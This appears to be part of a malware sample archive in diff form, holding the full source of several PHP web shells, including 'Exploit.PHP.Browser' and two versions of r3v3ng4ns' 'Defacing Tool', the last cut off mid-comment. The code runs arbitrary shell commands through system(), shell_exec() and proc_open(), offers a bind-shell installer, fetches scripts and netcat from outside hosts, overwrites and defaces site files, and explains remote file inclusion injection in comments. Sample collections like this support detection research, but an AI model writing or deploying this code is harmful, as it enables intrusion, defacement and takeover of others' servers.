echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>
Download from Hard:<INPUT type=\"file\" name=\"userfile\" id=input2>
<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
</td><td><INPUT type=\"submit\" value=\"Download\" id=input></form></div></td></tr></table>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
<table id=tb><tr><td>Install bind
<b>Temp path</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\"></td><td>
<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\" maxlength=5 size=4></td><td>
<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
<INPUT type=\"submit\" value=\"Install\" id=input></form></div></td></table>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" name=fe>
<table id=tb><tr><td>File to edit:
<input type=\"text\" name=\"editfile\" ></td><td>
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<INPUT type=\"submit\" value=\"Edit\" id=input></form></div></td></table>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
<table id=tb><tr><td>
<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
<INPUT type=\"submit\" value=\"PHP code\" id=input></form></div></td></table>";
?>
</td></tr></table>
</td></tr>
<tr valign="BOTTOM">
<td valign=bottom>
<center>Coded by Loader <a href="http://pro-hack.ru">Pro-Hack.RU</a></center>
</td>
</tr>
</table>

268
PHP/Backdoor.PHP.WebShell.af Normal file
View File

File diff suppressed because one or more lines are too long

84
PHP/Backdoor.PHP.WebShell.b Normal file
View File

@ -0,0 +1,84 @@
<html>
<head><title>EXPLOIT.PHP.BROWSER</title></head>
<body><h1>EXPLOIT.PHP.BROWSER</h1>
<?
// Exploit.PHP.Browser By Psychologic
// Take ur own risk if you do stupid things
// with this.
if (isset($dir_kerja)) {
chdir($dir_kerja); //change to working directory
$dir_kerja = exec("pwd"); //execute the pwd(daemon)
} else {
chdir($DOCUMENT_ROOT); //Get the root directory
$dir_kerja = $DOCUMENT_ROOT;
}
if (trim($dir_baru) <> "") {
chdir($dir_baru);
$dir_kerja = exec("pwd");
}
?>
<form name="myform" action="<? echo $PHP_SELF ?>" method="post">
<p>Active directory : <b>
<?
$split_dir_kerja = explode("/", substr($dir_kerja, 1));
echo "<a href=\"$PHP_SELF?dir_kerja=" . urlencode($url) . "/&command=" . urlencode($command) . "\">Root</a>/";
if ($split_dir_kerja[0] == "") {
$dir_kerja = "/";
} else {
for ($i = 0; $i < count($split_dir_kerja); $i++) {
$url .= "/" . $split_dir_kerja[$i];
echo "<a href=\"$PHP_SELF?dir_kerja=" . urlencode($url) . "&command=" . urlencode($command) . "\">$split_dir_kerja[$i]</a>/";
}
}
// See you can look at many virtual host
?>
</b></p>
<p>Choose your new work directory</p>
<select name="dir_kerja" onChange="this.form.submit()">
<?
$dir_handle = opendir($dir_kerja);
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == ".") {
echo "<option value=\"$dir_kerja\" selected>Choose Directory</option>\n";
} elseif ($dir == "..") {
if (strlen($dir_kerja) == 1) {
} elseif (strrpos($dir_kerja, "/") == 0) {
echo "<option value=\"/\">Main Directory</option>\n";
} else {
echo "<option value=\"". strrev(substr(strstr(strrev($dir_kerja), "/"), 1)) ."\"> Main Directory </option>\n";
}
} else {
if ($dir_kerja == "/") {
echo "<option value=\"$dir_kerja$dir\">$dir</option>\n";
} else {
echo "<option value=\"$dir_kerja/$dir\">$dir</option>\n";
}
}
}
}
closedir($dir_handle);
?>
</select>
<input type="text" name="dir_baru" size="60" value="">
<p>Perintah :</p>
<input type="text" name="command" size="60" <? if ($command) { echo "value=\"$command\"";} ?> >
<p><input name="submit_btn" type="submit" value="Execute command"></p>
<p>Perapian <code>stderr</code> diperlukan?
<input type="checkbox" name="stderr"></p>
<p>Hasil Eksekusi :</p>
<textarea cols="80" rows="20" readonly>
<?
if ($command) {
if ($stderr) {
system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
} else {
system($command);
}
}
?>
</textarea>
</form>
</body>
</html>

214
PHP/Backdoor.PHP.WebShell.f Normal file
View File

@ -0,0 +1,214 @@
<!--
Defacing Tool 2.0 by r3v3ng4ns
revengans@gmail.com
se for modificar o codigo, por favor, mantenha o nome de seus autores originais
e por favor, mantenha a cmd priv8. se vc recebeu o codigo ou url, confiei(amos) em vc...
-->
<?php
@closelog();
@error_reporting(0);
$vers="2.0beta priv8!";
$remote_addr="http://dezu.webshells.org/";
$format_addr=".dat";
$cmd_addr=$remote_addr."tool20".$format_addr;
$safe_addr=$remote_addr."safe20".$format_addr;
$writer_addr=$remote_addr."writer20".$format_addr;
$phpget_addr=$remote_addr."get20".$format_addr;
$feditor_addr=$remote_addr."filed".$format_addr;
$put_addr=$remote_addr."filed_put".$format_addr;
$total_addr="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
if(empty($chdir)) $chdir = @$_GET['chdir'];
if(empty($cmd)) $cmd = @$_GET['cmd'];
if(empty($fu)) $fu = @$_GET['fu'];
if(empty($list)) $list = @$_GET['list'];
if(empty($chdir) or $chdir=='') $chdir=getcwd();
$cmd = stripslashes(trim($cmd));
//CHDIR tool
if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
$boom = explode(" ",$cmd,2);
$boom2 = explode(";",$boom['1'], 2);
$toDir = $boom2['0'];
if($boom['1']=="/")$chdir="";
else if(strpos($cmd, 'chdir ..')!==false){
$cadaDir = array_reverse(explode("/",$chdir));
if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
$toDir = str_replace($lastDir,"",$chdir);
if($toDir=="/")$chdir="";
}
else if(strpos($cmd, 'chdir .')===0) $toDir = getcwd();
else if(strpos($cmd, 'chdir ~')===0) $toDir = getcwd();
if(strrpos($toDir,"/")==(strlen($toDir)-1)) $toDir=substr($toDir,0,strrpos($toDir,"/"));
if(@opendir($toDir)!==false or @is_dir($toDir)) $chdir=$toDir;
else if(@opendir($chdir."/".$toDir)!==false or @is_dir($chdir."/".$toDir)) $chdir=$chdir."/".$toDir;
else $ch_msg="dtool: line 1: chdir: $toDir: No such directory.\n";
if($boom2['1']==null) $cmd = trim($boom['2']); else $cmd = trim($boom2['1'].$boom2['2']);
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
}
if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permission have been denied in dir '$chdir'. Anyway, you can try to send a command here now. If you haven't accessed it, try to use 'cd' in the cmd line instead.\n";
$cmdShow = $cmd;
//To keep the changes in the url, when using the 'GET' way to send php variables
if(empty($post)){
if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'";
if($fu=="" or $fu=="0" or empty($fu))$showfu="";else $showfu="+'fu=$fu&'";
if($list=="" or $list=="0" or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'"; $fl="off";}
}
//INFO table (pro and normal)
if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";
$safe = @ini_get($safemode);
if ($safe) $pro8="<b><i>safe_mode</i>: YES</b>, "; else $pro7="<b><i>safe_mode</i>: NO</b>, ";
$pro8 = "<i>PHP </i>".phpversion();
$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8;
$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
$ip=@gethostbyname($_SERVER['HTTP_HOST']);
//Turns the 'ls' command more usefull, showing it as it looks in the shell
if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd);
else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd);
else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd);
else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd);
else if($cmd=='ls') $cmd = "ls -F";
//If there are some '//' in the cmd, its now removed
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
?>
<body onload="focar();">
<style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;height:23px}
.infop{font-family: verdana; font-size: 10px; color:#000000;}
.infod{font-family: verdana; font-size: 10px; color:#414978;}
.algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
.titulod{font:Verdana; color:#414978; font-size:20px;}</style>
<script>
function inclVar(){var addr = location.href.substring(0,location.href.indexOf('?')+1);var stri = location.href.substring(addr.length,location.href.length+1);inclvar = stri.substring(0,stri.indexOf('='));}
function enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl;?>+'cmd='+window.document.formulario.cmd.value;return false;}
function ativaFe(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl;?>+'fu='+qual+'&cmd='+window.document.formulario.cmd.value;return false;}
function PHPget(){inclVar(); if(confirm("O PHPget agora oferece uma lista pronta de urls,\nvc soh precisa escolher qual arquivo enviar para o servidor.\nDeseja utilizar isso? \nClique em Cancel para usar o PHPget normal, ou \nem Ok para usar esse novo recurso."))goPreGet(); else{var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","http://hostinganime.com/tool/nc.dat");var dir = c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);}}
function goPreGet(){inclVar();window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'pre=1');}
function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://hostinganime.com/tool/reven.htm");var dir = url.substring(0,url.lastIndexOf('/')+1);var file = url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P - by r3v3ng4ns");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);}
function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php"); var dir = o.substring(0,o.lastIndexOf('/')+1);var file = o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);}
function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'?&'<?=$showdir;?>;}else{ return false }}
function list(turn){inclVar();if(turn=="off")turn=0;else if(turn=="on")turn=1; window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu;?>+'list='+turn+'&cmd='+window.document.formulario.cmd.value;return false;}
function overwrite(){inclVar();if(confirm("O script tentara substituir todos os arquivos (do diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize http:// e ftp://")){keyw=prompt("Digite a palavra chave",".jpg");newf=prompt("Digite a origem do arquivo que substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");if(confirm("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos arquivos, o diretorio deve ser writable.")){trydel=1}else{trydel=0} if(confirm("Deseja substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de origem.")){window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu?>+'&keyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;}}}
</script>
<table width="760" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
<tr><td><div align="center" class="titulod"><b>[ Defacing Tool Pro v<?=$vers;?> ] <a href="mailto:revengans@gmail.com">?</a></font><br>
<font size=3>by r3v3ng4ns - revengans@gmail.com </font>
</b></div></td></tr>
<tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = @posix_uname();
while (list($info, $value) = each ($uname)) { ?>
<TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?>
<TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR>
<TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR>
<? if($chdir!=getcwd()){?>
<TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?>
<TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?>
</DIV></TD></TR></TABLE></td></tr>
<tr><td><form name="formulario" id="formulario" method="post" action="#" onSubmit="return enviaCMD()">
<table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr>
<td width="75"><DIV class="algod">command</DIV></td>
<td width="300"><input name="cmd" type="text" id="cmd" value='<?=$cmdShow;?>' style="width:295; font-size:12px" class="campo">
<script>
function focar(){window.document.formulario.cmd.focus();window.document.formulario.cmd.select();}
</script>
</td></tr></table><table><tr><td>
<?php
ob_start();
if(isset($chdir)) @chdir($chdir);
function safemode($what){echo "This server is in safemode. Try to use DTool in Safemode.";}
function nofunction($what){echo "The admin disabled all the functions to send a cmd to the system.";}
function shell($what){echo(shell_exec($what));}
function popenn($what){
$handle=popen("$what", "r");
$out=@fread($handle, 2096);
echo $out;
@pclose($handle);
}
function execc($what){
exec("$what",$array_out);
$out=implode("\n",$array_out);
echo $out;
}
function procc($what){
//na sequencia: stdin, stdout, sterr
if($descpec = array(0 => array("pipe", "r"),1 => array("pipe", "w"),2 => array("pipe", "w"),)){
$process = @proc_open("$what",$descpec,$pipes);
if (is_resource($process)) {
fwrite($pipes[0], "");
fclose($pipes[0]);
while(!feof($pipes[2])) {
$erro_retorno = fgets($pipes[2], 4096);
if(!empty($erro_retorno)) echo $erro_retorno;//isso mostra tds os erros
}
fclose($pipes[2]);
while(!feof($pipes[1])) {
echo fgets($pipes[1], 4096);
}
fclose($pipes[1]);
$ok_p_fecha = @proc_close($process);
}else echo "It seems that this PHP version (".phpversion().") doesn't support proc_open() function";
}else echo "This PHP version ($pro7) doesn't have the proc_open() or this function is disabled by php.ini";
}
$funE="function_exists";
if($safe){$fe="safemode";$feshow=$fe;}
elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";}
elseif($funE('passthru')){$fe="passthru";$feshow=$fe;}
elseif($funE('system')){$fe="system";$feshow=$fe;}
elseif($funE('exec')){$fe="execc";$feshow="exec";}
elseif($funE('popen')){$fe="popenn";$feshow="popen";}
elseif($funE('proc_open')){$fe="procc";$feshow="proc_open";}
else {$fe="nofunction";$feshow=$fe;}
if($fu!="0" or !empty($fu)){
if($fu==1){$fe="passthru";$feshow=$fe;}
if($fu==2){$fe="system";$feshow=$fe;}
if($fu==3){$fe="execc";$feshow="exec";}
if($fu==4){$fe="popenn";$feshow="popen";}
if($fu==5){$fe="shell";$feshow="shell_exec";}
if($fu==6){$fe="procc";$feshow="proc_open";}
}
$fe("$cmd 2>&1");
$output=ob_get_contents();ob_end_clean();
?>
<td><input type="button" name="snd" value="send cmd" class="campo" style="background-color:#313654" onClick="enviaCMD()"><select name="qualF" id="qualF" class="campo" style="background-color:#313654" onchange="ativaFe(this.value);">
<option><?="using $feshow()";?>
<option value="1">use passthru()
<option value="2">use system()
<option value="3">use exec()
<option value="4">use popen()
<option value="5">use shell_exec()
<option value="6">use proc_open()*new
<option value="0">auto detect (default)
</select><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><br><input type="button" name="edBtn" value="fileditor" class="campo" onClick="PHPf()"><input type="button" name="listBtn" value="list files <?=$fl;?>" class="campo" onClick="list('<?=$fl;?>')"><? if ($list==1){ ?><input type="button" name="sbstBtn" value="overwrite files" class="campo" onClick="overwrite()"><input type="button" name="MkDirBtn" value="mkdir" class="campo" onClick="mkDirF()"><input type="button" name="ChModBtn" value="chmod" class="campo" onClick="chmod()"><br>
<? } ?><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()">
</tr></table></td></tr></table></form></td></tr>
<tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdShow</i>\", using <i>$feshow()</i>";?></i></DIV>
<TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;">
<?php
echo $ch_msg;
if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir <diretorio>; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o 'cd' numa shell, mas precisa ser o primeiro da linha. Os arquivos listados pelo filelist sao o do diretorio especificado ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Overwrite\nfale com o r3v3ng4ns :P");
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?></TEXTAREA><BR></td></tr>
<?php
if($list=="1") @include($remote_addr."flist".$format_addr);
?>
</table

366
PHP/Backdoor.PHP.WebShell.k Normal file
View File

@ -0,0 +1,366 @@
<!--
Defacing Tool Pro v1.7 comentado by r3v3ng4ns
Autor: r3v3ng4ns - revengans@hotmail.com
Modifique, copie e distribua mas, por favor, mantenha o nome dos autores originais
A minha intencao inicial sempre foi deixar o script publico, apesar da decisao do meu grupo de deixa-lo priv8.
Mas, deixando-o priv8, ele poderia parar por aqui. Por isso, fiz essa versao comentada do script, e estou tornando-a
publica. Espero que voces desenvolvam cada vez mais o script, melhorem ele e, por favor, deixando o nome dos autores
originais. Peço ainda que vcs me enviem um email (revengans@hotmail.com) com a versao do script que voces fizeram.
Por enquanto, soh tornei publico e comentado o pro17 (a parte principal da cmd). Os scripts complementares eu ainda
vou comenta-los mas, apesar das ferias, ainda estou sem tempo :P. E passo depois os comentarios para ingles...
ps. : eu sei que o filh0te vai ficar puto da vida pq eu estou fzendo isso, mas eu posso :P
pps.: essa versao aqui eh a mesma que era priv8. com excessao de que esta comentada (e muito. acho q exagerei).
ppps: desligue o wordwrap (quebra de linha) do seu editor para visualizar da maneira correta o codigo.
//-> r3v3ng4ns
//-> there's no patch for the stupidity of mankind
-->
<?php
@closelog();//desliga o system logger
@error_reporting(0);//desativa a exibicao de erros. ligue isto aki para qndo for testar o script no seu pc.
// Variaveis que o script usa
$vers="1.7.2 comentado (ex-priv8)";//versao do script
$remote_addr="http://127.0.0.1/~snagnever/defacement/paginanova/";//endereco remoto da pasta aonde estao os scripts
$format_addr=".txt";//extensao dos arquivos dos scripts
$cmd_addr=$remote_addr."pro17".$format_addr;//nome do arquivo do script da cmd (esse aqui, o script principal)
$safe_addr=$remote_addr."safe17".$format_addr;//nome do arquivo do script do dtool em safemode
$writer_addr=$remote_addr."writer17".$format_addr;//nome do arquivo do script que escreve no diretorio
$phpget_addr=$remote_addr."get17".$format_addr;//nome do arquivo do script que faz download de arquivos
$feditor_addr=$remote_addr."feditor".$format_addr;//nome do arquivo do script que edita arquivos online
$put_addr=$remote_addr."feditor_put".$format_addr;//nome do arquivo do script que salva os arquivos editados
$total_addr="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];//endereco do servidor que esta sendo invadido
$chdir=$_GET['chdir'];//pega a variavel $chdir na url do navegador (?chdir=...)
if($chdir=="")$chdir=getcwd();//se a variavel $chdir for vazia, ele a determina como o diretorio atual
//pega as variaveis usadas no script da url do navegador (www.com.br/index.php?fu=1&list=1&cmd=id)
$fu=$_GET['fu'];//para definir qual metodo (funcao) sera usada para enviar o comando pelo script para o sistema
$list=$_GET['list'];//para listar as cartas em modo texto com links clicaveis
$cmd=$_GET['cmd'];//o comando que serah enviado para o sistema
$cmd=stripslashes($cmd);//tira backslashs a mais do cmd
$ch_msg="";//define a msg de erro do 'chdir' como vazia
//pega informacoes do usuario atual (normalmente apache ou nobody)
$login=@posix_getuid();
$euid=@posix_geteuid();
$gid=@posix_getgid();
// Comando CHDIR do dtool. serah comentado parte a parte
//reconhece se ha a string 'chdir' na variavel $cmd e verifica se a posicao dessa string eh 0,
//ou seja, a primeira da linha. todos os !==false poderiam ser tirados, mas assim facilita o
//entendimento
if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
//se sim, explode a variavel $cmd, separando-a por ' '(espacos em branco) num array $boom
//sendo assim, boom['0'] eh a string 'chdir', e boom['1'] eh o diretorio no qual o usuario
//deseja entrar e o restante dos comandos (separados por ';')
$boom = explode(" ",$cmd,2);
//explode o $boom['1'] separando a string por ';', para separar o diretorio no qual o usuario
//deseja ir e o restantes dos comandos, na array $boom2. sendo assim, $boom2['0'] eh o diretorio
//que o usuario deseja ir e $boom2['1'] eh o restante dos comandos.
$boom2 = explode(";",$boom['1'], 2);
$diretorio = $boom2['0'];//aqui define $diretorio como $boom2['0']
if($boom['1']=="/")$chdir="";//se o usuario desejar ir ao diretorio root ('/'), a variavel $chdir aqui
//eh definida como '' pois, mais para frente, ele recebera o valor '/'.
//mas se o comando dado pelo usuario contiver 'chdir ..', isso quer dizer que o usuario deseja subir
//um nivel.
else if(strpos($cmd, 'chdir ..')!==false){
//aqui ele primeio explode o $chdir (que agora eh o diretorio atual em que o usuario esta) por '/' e
//depois inverte a ordem das arrays, sendo que, agora, o $cadaDir['0'] eh o ultimo diretorio em que
//o usuario esta (ou seja, se $chdir fosse '/etc/httpd/conf/php' o $cadaDir['0'] seria 'php'
$cadaDir = array_reverse(explode("/",$chdir));
//se o ultimo diretorio for vazio, isso quer dizer q $chdir estava no formato '/etc/httpd/conf/php/' ou seja,
//tinha uma '/' no final. sendo assim, o $lastDir serah a $cadaDir['1']. e adiciona-se uma '/' a variavel.
if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
//se nao for vazio, o $lastDir vai ser o $cadaDir['0'] mesmo, e adiciona-se uma '/' a variavel $lastDir,
//que, seguindo o exemplo de $chdir='/etc/httpd/conf/php', entao $lastDir seria ='php/.
//alem disso tudo acima, o $chdir agora recebe uma '/' como ultima caractere
else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
//agora, da string $diretorio remove-se $lastDir. ou seja:
//sendo $diretorio='/etc/httpd/conf/php/'
//e $lastDir='php/'
//remove-se 'php/' de '/etc/httpd/conf/php/', tornando $diretorio='/etc/httpd/conf/'
$diretorio = str_replace($lastDir,"",$chdir);
//com a possibilidade de um imprevisto ocorrer aih em cima, novamente se o usuario quiser ir ao diretorio
//root ('/'), o $diretorio eh definido como '', (vazio)
if($diretorio=="/")$chdir="";
}
//se houver uma '/' como ultima caractere da string $diretorio, remove-se ela.
if(strrpos($diretorio,"/")==(strlen($diretorio)-1)) $diretorio=substr($diretorio,0,strrpos($diretorio,"/"));
//se for possivel abrir o diretorio, define o $chdir como = $diretorio, para usa-lo mais lah em baixo,
//no envio do comando para o sistema e para mante-lo na url
if(@opendir($chdir."/".$diretorio)!==false) $chdir=$chdir."/".$diretorio;
else if(@opendir($diretorio)!==false) $chdir=$diretorio;
//se nao for possivel entra no dir, define a msg de erro.
else $ch_msg="dtool: line 1: chdir: $diretorio: No such directory or permission denied.\n";
if($boom2['1']==null) $cmd = $boom['2']; else $cmd = $boom2['1'].$boom2['2'];
}
//define o comando que serah mostrado para o usario o que o comando eh ateh aki
//mais para baixo, o comando que efetivamente serah enviado para o sistema serah modificado
$cmdshow=$cmd;
//se as variaveis estiverem definidas, aqui sao definidas os $show* para mante-los na url em cada envio
//de comando do usuario.
if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'";
if($fu=="" or $fu=="0" or empty($fu))$showfu="";else $showfu="+'fu=$fu&'";//se $fu for definida, mantem ele na url
if($list=="" or $list=="0" or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'"; $fl="off";}
//procura alguns arquivos que mais tarde podem ser uteis ao usuario
if (@is_dir("/usr/X11R6/")) $pro0="<i>X11</i> at /usr/X11R6/, ";//procura a pasta do x11
if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";//procura o xterm
if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";//procura o netcat
if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";//procura o wget
if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";//procura o lynx
if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";//procura o gcc
if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";//procura o cc
$pro=$pro0.$pro1.$pro2.$pro3.$pro4.$pro5.$pro6;//junta tudo numa variavel
$ip=@gethostbyname($_SERVER['HTTP_HOST']);//mostra o ip do usuario
//arqui, se a $cmd tiver o comando 'ls', adiciona-se o parametro '-F' aa 'ls', deixando
//'ls -F', mas procura-se manter os outros parametros que o usuario deixou para o ls.
//par isso definiu o $cmdshow lah em cima, isso aqui o usuario nao sabe. o parametro
//'-F' no ls facilita a visualizacao dos arquivos.
if(strpos($cmd, 'ls --') !==false){ $cmd = str_replace('ls --', 'ls -F --', $cmd);}
else if(strpos($cmd, 'ls -') !==false){ $cmd = str_replace('ls -', 'ls -F', $cmd);}
else if(strpos($cmd, ';ls') !==false){ $cmd = str_replace(';ls', ';ls -F', $cmd);}
else if(strpos($cmd, '; ls') !==false){ $cmd = str_replace('; ls', ';ls -F', $cmd);}
else if($cmd=='ls'){$cmd = "ls -F";}
//se houverem '//' no $chdir, aki sao removidas
if(strpos($chdir, '//') !==false) $chdir = str_replace('//', '/', $chdir);
?>
<body onload="window.document.c.comando.focus();window.document.c.comando.select();">
<style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;height:23px}
.infop{font-family: verdana; font-size: 10px; color:#000000;}
.infod{font-family: verdana; font-size: 10px; color:#414978;}
.algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
.titulod{font:Verdana; color:#414978; font-size:20px;}</style>
<script>
//aqui sao as funcoes do javascript, que sao chamadas ao enviar o form, ou ao clicar num botao das ferramentas do dtool
//Variavel de Include
//essa funcao descobre a variavel que eh usada na pagina vulneravel para injetar o codigo
//malicioso. eh aquela variavel que vem depois do '?' e antes do '='. tipo:
//www.com.br/index.php?site= ----> aqui no caso, a inclvar eh 'site'
function inclVar(){
var addr = location.href.substring(0,location.href.indexOf('?')+1);
var stri = location.href.substring(addr.length,location.href.length+1);
inclvar = stri.substring(0,stri.indexOf('='));
}
//essa funcao envia o comando para o sistema, colocando-o na url do navegador.
//a funcao enviaCMD() estah colocada no evento onSubmit do form, o que quer dizer que antes
//da form ser enviada, ele executara a funcao. se a funcao retornar true, a form eh enviada. caso
